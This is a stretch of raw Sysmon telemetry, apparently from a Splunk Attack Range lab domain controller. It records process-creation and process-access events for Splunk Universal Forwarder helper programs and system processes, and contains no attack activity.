14:03:45.386{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.386{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:45.385{59A5CD1D-9541-6005-5705-00000000A301}6860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.932{59A5CD1D-9542-6005-5905-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.198{59A5CD1D-9542-6005-5805-00000000A301}60446120C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.041{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:46.042{59A5CD1D-9542-6005-5805-00000000A301}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:47.091{59A5CD1D-9542-6005-5905-00000000A301}36884908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.869{59A5CD1D-9544-6005-5B05-00000000A301}64005692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 